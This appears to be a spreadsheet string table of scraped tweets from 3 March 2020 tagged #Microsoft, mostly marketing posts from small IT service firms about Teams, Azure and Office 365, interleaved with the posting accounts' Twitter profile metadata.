    <t>{'id': 3320036251, 'id_str': '3320036251', 'name': 'Advantage Technology', 'screen_name': 'AdvantageTechWV', 'location': 'Charleston, WV', 'description': 'Advantage Technology is a full service Information Technology Firm located in downtown Charleston, WV.', 'url': 'https://t.co/3ULS8FvyFn', 'entities': {'url': {'urls': [{'url': 'https://t.co/3ULS8FvyFn', 'expanded_url': 'http://www.advantage.tech/', 'display_url': 'advantage.tech', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 59, 'friends_count': 66, 'listed_count': 2, 'created_at': 'Wed Aug 19 12:25:05 +0000 2015', 'favourites_count': 3, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 860,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'http://pbs.twimg.com/profile_images/633978726502391808/KeTBv1Rr_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/633978726502391808/KeTBv1Rr_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3320036251/1478286253',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</si>
  <si>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13:37:21 +0000 2020</t>
  </si>
  <si>
    <t>Guy who named 'BlueKeep' Windows flaw joins Microsoft Threat Protection https://t.co/OCiDDpMhcW #Microsoft</t>
  </si>
  <si>
    <t>Tue Mar 03 13:37:06 +0000 2020</t>
  </si>
  <si>
    <t>86% of executives blame a lack of teamwork for team problems and failures. Yikes! Check out this infographic for more on how #Teamworksolutions from #Microsoft allow you to work with anyone, inside or outside your business. https://t.co/hkZDUmX7je</t>
  </si>
  <si>
    <t>{'id': 200123374, 'id_str': '200123374', 'name': "AccuTech Int'l", 'screen_name': 'accutechpro', 'location': 'Detroit, MI', 'description': 'IT Support, IT Consulting, Networking, Computer Repair, Security &amp; Compliance, Web Development and more...', 'url': 'http://t.co/EE40MUUTyf', 'entities': {'url': {'urls': [{'url': 'http://t.co/EE40MUUTyf', 'expanded_url': 'http://www.accutechpro.com', 'display_url': 'accutechpro.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 160, 'friends_count': 294, 'listed_count': 3, 'created_at': 'Fri Oct 08 14:13:06 +0000 2010', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 251, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '00396C', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme15/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme15/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1181874669/ACCUTECH-Tag-SN_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1181874669/ACCUTECH-Tag-SN_normal.jpg', 'profile_link_color': '003A6D', 'profile_sidebar_border_color': 'A8C7F7', 'profile_sidebar_fill_color': 'FEC300', 'profile_text_color': '333333', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Tue Mar 03 13:36:59 +0000 2020</t>
  </si>
  <si>
    <t>From enhanced services to optimized defense and intelligence operations, read how #Microsoft for Government is empowering public institutions worldwide. https://t.co/IkieYfMuki</t>
  </si>
  <si>
    <t>Tue Mar 03 13:36:40 +0000 2020</t>
  </si>
  <si>
    <t>86% of executives blame a lack of teamwork for team problems and failures. Yikes! Check out this infographic for more on how #Teamworksolutions from #Microsoft allow you to work with anyone, inside or outside your business. https://t.co/pEmjSFkvtR</t>
  </si>
  <si>
    <t>Tue Mar 03 13:36:19 +0000 2020</t>
  </si>
  <si>
    <t>Want to change the way your employees communicate? Check out this video to see how @CliftonCoffeeRoasters expanded their business with #Teamworksolutions from #Microsoft. https://t.co/zeH8CLlGqL</t>
  </si>
  <si>
    <t>Tue Mar 03 13:36:04 +0000 2020</t>
  </si>
  <si>
    <t>Discover Microsoft's 3-step approach to GDPR. With #Microsoft 365, Computer SuperCenter helps customers achieve compliance and stay secure. https://t.co/nxrl7PZBni</t>
  </si>
  <si>
    <t>{'id': 2861493238, 'id_str': '2861493238', 'name': 'Computer SuperCenter', 'screen_name': 'CSCGreenwich', 'location': 'Greenwich, CT', 'description': 'We fix #BrokenComputers (#DataRecovery on Macs &amp; PCs. And are an authorized reseller of the hottest brands of home electronics! 203-661-1700 #CT', 'url': 'http://t.co/dcsMhIwSM5', 'entities': {'url': {'urls': [{'url': 'http://t.co/dcsMhIwSM5', 'expanded_url': 'http://www.computersupercenter.com/', 'display_url': 'computersupercenter.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 423, 'friends_count': 1505, 'listed_count': 16, 'created_at': 'Tue Nov 04 21:26:04 +0000 2014', 'favourites_count': 1090, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2376, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '1C75BC', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme18/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme18/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/596417507839254528/KQLz30S8_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/596417507839254528/KQLz30S8_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2861493238/1421763708', 'profile_link_color': '4A913C',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</si>
  <si>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13:35:44 +0000 2020</t>
  </si>
  <si>
    <t>Don't be fooled. #Cloud and on-premise ERP solutions might look identical, yet there are often costs below the surface. This free TCO Iceberg Infographic explains:    #Microsoft #Technology #BusinessAutomation #accounting #MSDyn365 https://t.co/AykHhzXteY</t>
  </si>
  <si>
    <t>{'id': 3073882790, 'id_str': '3073882790', 'name': 'Cornerstone.IT', 'screen_name': 'CStone_IT', 'location': 'NY, PA, DC, CA', 'description': 'https://t.co/YRVo1gTqAd is a leading IT Business Solutions and Managed Services Provider with offices in New York, Philadelphia, Washington, DC and Los Angeles.', 'url': 'http://t.co/WioLVEYgDI', 'entities': {'url': {'urls': [{'url': 'http://t.co/WioLVEYgDI', 'expanded_url': 'http://www.cornerstone.it/', 'display_url': 'cornerstone.it', 'indices': [0, 22]}]}, 'description': {'urls': [{'url': 'https://t.co/YRVo1gTqAd', 'expanded_url': 'http://Cornerstone.IT', 'display_url': 'Cornerstone.IT', 'indices': [0, 23]}]}}, 'protected': False, 'followers_count': 128, 'friends_count': 155, 'listed_count': 19, 'created_at': 'Wed Mar 11 21:00:44 +0000 2015', 'favourites_count': 306, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1114,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'http://pbs.twimg.com/profile_images/1081199559613837312/_e9i5I5o_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1081199559613837312/_e9i5I5o_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3073882790/1537188231', 'profile_link_color': '0061AA',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</si>
  <si>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13:35:10 +0000 2020</t>
  </si>
  <si>
    <t>Discover how #PowerBI enables Virgin Atlantic to create quick wins for internal #customerservice by unlocking the full potential of data. Learn more from Seepath Solutions. #Microsoft https://t.co/f5sfb1FaWN</t>
  </si>
  <si>
    <t>{'id': 114039020, 'id_str': '114039020', 'name': 'Seepath Solutions', 'screen_name': 'seepath', 'location': 'Jersey City, NJ', 'description': 'Thinking of azure? Let SEEPATH Azure rock stars accelerate your cloud journey. Cloud migration, Site Recovery, App modernization &amp; fully managed azure in CSP', 'url': 'https://t.co/U5dTYQndqF', 'entities': {'url': {'urls': [{'url': 'https://t.co/U5dTYQndqF', 'expanded_url': 'https://www.seepath.com', 'display_url': 'seepath.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 46, 'friends_count': 121, 'listed_count': 4, 'created_at': 'Sat Feb 13 22:22:30 +0000 2010', 'favourites_count': 16, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 509,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'http://pbs.twimg.com/profile_images/1242525993/Seepath_wings_bigger_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1242525993/Seepath_wings_bigger_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/114039020/1475164838', 'profile_link_color': '0084B4', 'profile_sidebar_border_color': 'BDDCAD', 'profile_sidebar_fill_color': '5E7354', 'profile_text_color': '333333', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Tue Mar 03 13:35:04 +0000 2020</t>
  </si>
  <si>
    <t>#Microsofts #CodeBERT ingests public #GitHub repositories to help you find code https://t.co/i2ryKEDLhC #coding #TechJunkieNews https://t.co/7YuWF9hMRA</t>
  </si>
  <si>
    <t>Tue Mar 03 13:34:54 +0000 2020</t>
  </si>
  <si>
    <t>How can you help students tackle the complex challenges of tomorrow? See how educators are transforming learning through student-centered approaches. #EducationalTechnology #K12 #MicrosoftEducation #Microsoft https://t.co/1JKPLJx7bi</t>
  </si>
  <si>
    <t>{'id': 57844895, 'id_str': '57844895', 'name': 'IPConnectX', 'screen_name': 'IPConnectX', 'location': '43.80347,-79.457407', 'description': '', 'url': 'http://t.co/r0UxOXN2nJ', 'entities': {'url': {'urls': [{'url': 'http://t.co/r0UxOXN2nJ', 'expanded_url': 'http://www.ipconnectx.ca', 'display_url': 'ipconnectx.ca', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 101, 'friends_count': 64, 'listed_count': 1, 'created_at': 'Sat Jul 18 03:42:40 +0000 2009', 'favourites_count': 1, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 776,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'http://pbs.twimg.com/profile_images/996474548664094731/Yknw82Rs_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/996474548664094731/Yknw82Rs_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/57844895/1550611643',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</si>
  <si>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13:34:50 +0000 2020</t>
  </si>
  <si>
    <t>Data-driven transformation is a journey that requires adaptability. With #Microsoft #Azure, Enform Technologies delivers the data, security and AI you need to build an agile data estate. https://t.co/nRgYIYwqMX</t>
  </si>
  <si>
    <t>{'id': 279268818, 'id_str': '279268818', 'name': 'Enform Technologies', 'screen_name': 'enformtech', 'location': 'Pewee Valley, KY', 'description': 'SMB and Healthcare focused provider of network managed services.', 'url': 'http://t.co/FCUJR2yvMR', 'entities': {'url': {'urls': [{'url': 'http://t.co/FCUJR2yvMR', 'expanded_url': 'http://www.enformtechnologies.com', 'display_url': 'enformtechnologies.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 252, 'friends_count': 298, 'listed_count': 15, 'created_at': 'Fri Apr 08 23:04:53 +0000 2011', 'favourites_count': 37, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 5700,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'http://pbs.twimg.com/profile_images/701872450544476162/VmgrNJXd_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/701872450544476162/VmgrNJXd_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/279268818/1456174403',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</si>
  <si>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13:34:36 +0000 2020</t>
  </si>
  <si>
    <t>Is your business in need of an updated communication platform? How about an easier way for employees to exchange ideas and drive innovation? Check out this video to see how #Teamworksolutions from #Microsoft can help your teams better communicate. https://t.co/rNag9Dq2dq</t>
  </si>
  <si>
    <t>{'id': 171140123, 'id_str': '171140123', 'name': 'Libis Bueno', 'screen_name': 'Domitek', 'location': 'Worcester, MA 01608', 'description': '', 'url': 'https://t.co/jXwwrTpq3e', 'entities': {'url': {'urls': [{'url': 'https://t.co/jXwwrTpq3e', 'expanded_url': 'http://www.domitek.net/our-blogs/', 'display_url': 'domitek.net/our-blogs/', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 128, 'friends_count': 137, 'listed_count': 2, 'created_at': 'Mon Jul 26 17:13:24 +0000 2010', 'favourites_count': 223, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1795,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'http://pbs.twimg.com/profile_images/651682103776575489/yslb51Of_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/651682103776575489/yslb51Of_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/171140123/1443080415', 'profile_link_color': '006E97',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</si>
  <si>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13:34:17 +0000 2020</t>
  </si>
  <si>
    <t>The #LinuxFoundation is Sometimes Against #Linux and Its Official Blog Posts Come From #Microsoft Veterans This Month (Nowadays It's Not Even Shocking)    https://t.co/XDNOmmHJ09</t>
  </si>
  <si>
    <t>Tue Mar 03 13:34:11 +0000 2020</t>
  </si>
  <si>
    <t>In the old days, @CliftonCoffeeRoasters had to print, scan, and fill out documents by hand. But since switching to #Teamworksolutions from #Microsoft, their employees work together on documents in a digital workspace. Check out this video for more. https://t.co/vB31KDbGng</t>
  </si>
  <si>
    <t>{'id': 928996894629560321, 'id_str': '928996894629560321', 'name': 'NovalisIT', 'screen_name': 'NovalisIT', 'location': 'Florence, KY', 'description': 'Founded in 2015, Novalis is a Value-Added Reseller and Provider of Managed IT, Cybersecurity, and Cloud Services for business.', 'url': 'https://t.co/XSvRCVWBC7', 'entities': {'url': {'urls': [{'url': 'https://t.co/XSvRCVWBC7', 'expanded_url': 'https://novalisit.com/', 'display_url': 'novalisit.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 13, 'friends_count': 22, 'listed_count': 0, 'created_at': 'Fri Nov 10 14:44:54 +0000 2017', 'favourites_count': 2, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 619, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1126352346022199298/6Ei1pgsZ_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1126352346022199298/6Ei1pgsZ_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/928996894629560321/1557378343',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</si>
  <si>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13:33:19 +0000 2020</t>
  </si>
  <si>
    <t>How can you help students tackle the complex challenges of tomorrow? See how educators are transforming learning through student-centered approaches. #EducationalTechnology #K12 #MicrosoftEducation #Microsoft https://t.co/u2DIY7SePF</t>
  </si>
  <si>
    <t>Tue Mar 03 13:33:12 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft at #HIMSS20202 | @HIMSS
@Health_IT @Azure @Office365 
March 9-13, 2020 | Orlando, FL
Orange County Convention Center
@Microsoft Booth 2300
https://t.co/Qd8q16QRoC
@HubBucket @HubAccess @HubDevOps
@HubDataOps @HubIoMT @HubBucketEdge
@ProsumerSoft @HubMedX https://t.co/TSsqJ09Fd4</t>
  </si>
  <si>
    <t>{'id': 2742938653, 'id_str': '2742938653', 'name': 'HubBucket | Healthcare and Medical Technology', 'screen_name': 'HubBucket', 'location': 'New York, NY', 'description': 'We develop #technology for #Healthcare Providers | #AI #MachineLearning #DeepLearning #CognitiveComputing | @HubBucket Inc CEO @Rosenchild | @ProsumerSoft', 'url': 'https://t.co/IfmRw6A67P', 'entities': {'url': {'urls': [{'url': 'https://t.co/IfmRw6A67P', 'expanded_url': 'http://hubbucket.xyz', 'display_url': 'hubbucket.xyz', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 5289, 'friends_count': 2912, 'listed_count': 1497, 'created_at': 'Mon Aug 18 19:53:23 +0000 2014', 'favourites_count': 268158, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 251639,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'http://pbs.twimg.com/profile_images/1215456071591976960/gtgzsfXi_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1215456071591976960/gtgzsfXi_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2742938653/1583206955', 'profile_link_color': '0063B1',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</si>
  <si>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13:32:32 +0000 2020</t>
  </si>
  <si>
    <t>Build sales momentum and close more deals with #Microsoft #Dynamics365. Streamline processes with interactive dashboards, Office 365 integration, built-in collaboration, mobile apps, and embedded sales capabilities. Watch the video. https://t.co/d9HwKhOqYv</t>
  </si>
  <si>
    <t>Tue Mar 03 13:32:21 +0000 2020</t>
  </si>
  <si>
    <t>Honeywell says it will soon launch the worlds most powerful quantum computer https://t.co/JIPEenai1j #Microsoft</t>
  </si>
  <si>
    <t>Tue Mar 03 13:32:04 +0000 2020</t>
  </si>
  <si>
    <t>With #Microsoft #Office365 #AdvancedThreatProtection, Net Universe offers an email filtering service that delivers stronger protection against specific types of advanced threats. https://t.co/3WAltHb5ro</t>
  </si>
  <si>
    <t>{'id': 292991447, 'id_str': '292991447', 'name': 'Net Universe', 'screen_name': 'netlatam', 'location': 'Miami - Florida', 'description': 'Company specialized in IT Projects, with the aim of advising, building and implementing innovative information technologies and communications in organizations.', 'url': 'http://t.co/NoPRT6FsS4', 'entities': {'url': {'urls': [{'url': 'http://t.co/NoPRT6FsS4', 'expanded_url': 'http://www.netuniversecorp.com', 'display_url': 'netuniversecorp.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 491, 'friends_count': 98, 'listed_count': 6, 'created_at': 'Wed May 04 15:40:51 +0000 2011', 'favourites_count': 93, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2571,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'http://pbs.twimg.com/profile_images/906284661978091521/f8aBxKRG_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/906284661978091521/f8aBxKRG_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/292991447/1504909617',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</si>
  <si>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With #Microsoft #Office365 #AdvancedThreatProtection, Net Universe offers an email filtering service that delivers stronger protection against specific types of advanced threats. https://t.co/ABdsBEMNsZ</t>
  </si>
  <si>
    <t>{'id': 1425902196, 'id_str': '1425902196', 'name': 'Julian Abuin', 'screen_name': 'julianabuin', 'location': 'Miami - Florida', 'description': '', 'url': 'https://t.co/ZVq4m7HVPA', 'entities': {'url': {'urls': [{'url': 'https://t.co/ZVq4m7HVPA', 'expanded_url': 'http://www.netuniversecorp.com', 'display_url': 'netuniversecorp.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 154, 'friends_count': 168, 'listed_count': 8, 'created_at': 'Mon May 13 17:04:53 +0000 2013', 'favourites_count': 54, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 721,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'http://pbs.twimg.com/profile_images/660177316048408577/NPFqVJ5S_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/660177316048408577/NPFqVJ5S_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1425902196/1504980004',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</si>
  <si>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13:32:02 +0000 2020</t>
  </si>
  <si>
    <t>How can you help students tackle the complex challenges of tomorrow? See how educators are transforming learning through student-centered approaches. #EducationalTechnology #K12 #MicrosoftEducation #Microsoft https://t.co/l8dhzIj5iI</t>
  </si>
  <si>
    <t>Tue Mar 03 13:31:55 +0000 2020</t>
  </si>
  <si>
    <t>How can you help students tackle the complex challenges of tomorrow? See how educators are transforming learning through student-centered approaches. #EducationalTechnology #K12 #MicrosoftEducation #Microsoft https://t.co/pLHqTMCWwH</t>
  </si>
  <si>
    <t>Tue Mar 03 13:31:46 +0000 2020</t>
  </si>
  <si>
    <t>How can you help students tackle the complex challenges of tomorrow? See how educators are transforming learning through student-centered approaches. #EducationalTechnology #K12 #MicrosoftEducation #Microsoft https://t.co/8M3t9KGgXQ</t>
  </si>
  <si>
    <t>Tue Mar 03 13:31:45 +0000 2020</t>
  </si>
  <si>
    <t>#AI #microsoft     Artificial Intelligence is rapidly becoming a mainstream technology. Read this developer's eBook for an introduction to the tools, infrastructure and services in the Microsoft AI platform that allow you to create intelligent apps. https://t.co/CqsEhHfLcv</t>
  </si>
  <si>
    <t>Tue Mar 03 13:31:18 +0000 2020</t>
  </si>
  <si>
    <t>Have you always dreamed of working from the beach? Now you can, with our #Teamworksolutions from #Microsoft. What are you waiting for? Check out this video to learn how you can empower your teams to work from virtually anywhere, on any device. https://t.co/eY7tPEsb8g</t>
  </si>
  <si>
    <t>Tue Mar 03 13:31:17 +0000 2020</t>
  </si>
  <si>
    <t>@saleem_bash our @Microsoft Cloud Product Specialist is giving a training on #MicrosoftO365 Administration for our #Microsoft #Cloud Partners from #Palestine 
#HappeningNow @LogicomDisti #Jordan #Microsoft #Office365 #MicrosoftCloud #Logicomevents https://t.co/Ui3GzcdKDD</t>
  </si>
  <si>
    <t>{'id': 260147693, 'id_str': '260147693', 'name': 'Abdulghani Jafar', 'screen_name': 'abdojafar', 'location': 'Amman', 'description': '\u200f\u200fØ§Ù„Ù„Ù‡Ù… Ø§Ø­ÙØ¸ Ù‡Ø°Ø§ Ø§Ù„Ø¨Ù„Ø¯ , Ø§Ù„Ø£Ø±Ø¯Ù† Ø¨Ø§Ù„Ù‚Ù„Ø¨\nBusiness Unit Manager - Logicom Distribution', 'url': 'https://t.co/BhEkMn444x', 'entities': {'url': {'urls': [{'url': 'https://t.co/BhEkMn444x', 'expanded_url': 'http://about.me/ajafar', 'display_url': 'about.me/ajafar', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 192, 'friends_count': 69, 'listed_count': 5, 'created_at': 'Thu Mar 03 08:45:56 +0000 2011', 'favourites_count': 864, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2149,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'http://pbs.twimg.com/profile_images/1201509384708378624/1WMAebJ3_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1201509384708378624/1WMAebJ3_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/260147693/1518071891', 'profile_link_color': '1B95E0', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': '99CC33', 'profile_text_color': '3E4415', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Tue Mar 03 13:30:55 +0000 2020</t>
  </si>
  <si>
    <t>Have you always dreamed of working from the beach? Now you can, with our #Teamworksolutions from #Microsoft. What are you waiting for? Check out this video to learn how you can empower your teams to work from virtually anywhere, on any device. https://t.co/O5c7vsn89T</t>
  </si>
  <si>
    <t>Tue Mar 03 13:30:23 +0000 2020</t>
  </si>
  <si>
    <t>What is #Microsoft #Teams ?
Want to know find out here : https://t.co/VdVLrCFI7i
#microsoftteams https://t.co/Jt15p2VhyI</t>
  </si>
  <si>
    <t>{'id': 48289403, 'id_str': '48289403', 'name': 'AME Solutions', 'screen_name': 'AMESolutions', 'location': 'Topsham Road, Exeter, Devon', 'description': '#ITSupport &amp; #ITtraining company based in Exeter. We offer #ITconsultancy for businesses looking to improve their current #ITNetwork or for #outsourcedITSupport', 'url': 'http://t.co/j00UAD1dqV', 'entities': {'url': {'urls': [{'url': 'http://t.co/j00UAD1dqV', 'expanded_url': 'http://www.amesolutions.co.uk', 'display_url': 'amesolutions.co.uk', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1407, 'friends_count': 2350, 'listed_count': 63, 'created_at': 'Thu Jun 18 08:27:01 +0000 2009', 'favourites_count': 1747, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3319,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'http://pbs.twimg.com/profile_images/995995493401612288/WcvmbIQA_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/995995493401612288/WcvmbIQA_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/48289403/1402926922',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</si>
  <si>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13:30:20 +0000 2020</t>
  </si>
  <si>
    <t>View the recording of our Migrating to WVD: Look no file shares! webinar with @Liquidware solutions architect @GeorgeWSwain and #Microsoft #WVD Global Black Belt @JimMoyle https://t.co/Q8hZkRW4SH #BetterTogether #AvailableNowNow https://t.co/Vsm3T34Fsp</t>
  </si>
  <si>
    <t>{'id': 65648451, 'id_str': '65648451', 'name': 'David Bieneman', 'screen_name': 'DavidBieneman', 'location': 'Chicago / Atlanta', 'description': 'CEO liquidware / virtual desktop enthusiast / prior venture vizioncore / father of four.\n\nLiquidware transforms monolithic desktops into dynamic workspaces.', 'url': 'https://t.co/kTqEVRUrHc', 'entities': {'url': {'urls': [{'url': 'https://t.co/kTqEVRUrHc', 'expanded_url': 'http://www.Liquidware.com', 'display_url': 'Liquidware.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 486, 'friends_count': 372, 'listed_count': 19, 'created_at': 'Fri Aug 14 14:35:39 +0000 2009', 'favourites_count': 1562, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1511,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'http://pbs.twimg.com/profile_images/999131547449024518/pYNif4NV_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/999131547449024518/pYNif4NV_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/65648451/1499392068',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</si>
  <si>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Tue Mar 03 13:30:03 +0000 2020</t>
  </si>
  <si>
    <t>Here's how we upgraded from #Skype for Business to #MicrosoftTeams at Microsoft. #Teams #Microsoft365 #Microsoft https://t.co/Fy2gGPViLk</t>
  </si>
  <si>
    <t>Tue Mar 03 13:30:01 +0000 2020</t>
  </si>
  <si>
    <t>Are you aware of the #Microsoft Azure Access CSP PoC? This powerful program provides #Azure credit to end-customers' subscriptions created in CSP. Find out more here: https://t.co/7eQtZytNnM #ArrowCloud https://t.co/2bk28arOJq</t>
  </si>
  <si>
    <t>Tue Mar 03 13:29:35 +0000 2020</t>
  </si>
  <si>
    <t>Did you know that 4 out of 5 of Fortune 500 companies have #Office365 and that it integrates with #MSDyn365? Read the eBook and learn more about the power behind these tools.    #Technology #ArtificialIntelligence #Microsoft #SMBs https://t.co/LXxlDT6YGF</t>
  </si>
  <si>
    <t>{'id': 308668155, 'id_str': '308668155', 'name': 'Enix Networks', 'screen_name': 'enixnetworks', 'location': 'St Pete Beach / Miami Beach / Sarasota', 'description': 'Microsoft Silver Partner\nManaged Services Provider\nServicing Tampa Bay, Sarasota, and Miami', 'url': 'http://t.co/WigbLJI2yC', 'entities': {'url': {'urls': [{'url': 'http://t.co/WigbLJI2yC', 'expanded_url': 'http://www.enix.net', 'display_url': 'enix.net', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 33, 'friends_count': 88, 'listed_count': 2, 'created_at': 'Tue May 31 20:04:09 +0000 2011', 'favourites_count': 3, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 108,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'http://pbs.twimg.com/profile_images/1487181860/enix-networks_logo_color_June-2010_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1487181860/enix-networks_logo_color_June-2010_normal.jpg', 'profile_link_color': 'C0D72D', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': '000000', 'profile_text_color': 'C0D72D', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Tue Mar 03 13:29:23 +0000 2020</t>
  </si>
  <si>
    <t>Live at 2PM EST! We made Two-Face last night because we had to save Selina, now we're on to try and save Harvey's soul.
https://t.co/6Dhv0hBC8W
#Batman #Telltale #XboxOne #Microsoft #Xbox #xboxonex #xboxonexgames #xboxonegamer #Xboxonegames ##gamesw... https://t.co/44jpPmpKDD https://t.co/aLTA5B19g5</t>
  </si>
  <si>
    <t>Tue Mar 03 13:29:04 +0000 2020</t>
  </si>
  <si>
    <t>Get help putting the right technology in your school. Learn how #Microsoft devices enable better learning outcomes.    #EducationalTechnology #K12 #MicrosoftEducation #Windows10 https://t.co/0ZdSR6KBuM</t>
  </si>
  <si>
    <t>Tue Mar 03 13:29:00 +0000 2020</t>
  </si>
  <si>
    <t>Does your company need Microsoft 365 Online Training.......try our Training App for all end users! #MicrosoftTeams #Microsoft #Microsoft365 #word #Excel #planner #powerpoint #sharepoint #forms #onedrive #onenote #sway #outlook #microsoftstream
Message me now for more details! https://t.co/iZYXGf1xYj</t>
  </si>
  <si>
    <t>{'id': 50288939, 'id_str': '50288939', 'name': 'Marie', 'screen_name': 'marie_spence86', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 6, 'friends_count': 16, 'listed_count': 0, 'created_at': 'Wed Jun 24 12:19:30 +0000 2009', 'favourites_count': 1, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/1234245871954538496/LE7pPTi0_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234245871954538496/LE7pPTi0_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/50288939/1583102122',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</si>
  <si>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13:28:40 +0000 2020</t>
  </si>
  <si>
    <t>via #BleepingComputer Blog: "Cisco Offering Free 90-day Webex Licenses Due to Coronavirus:" https://t.co/SBezOAZMuO
.
.
.
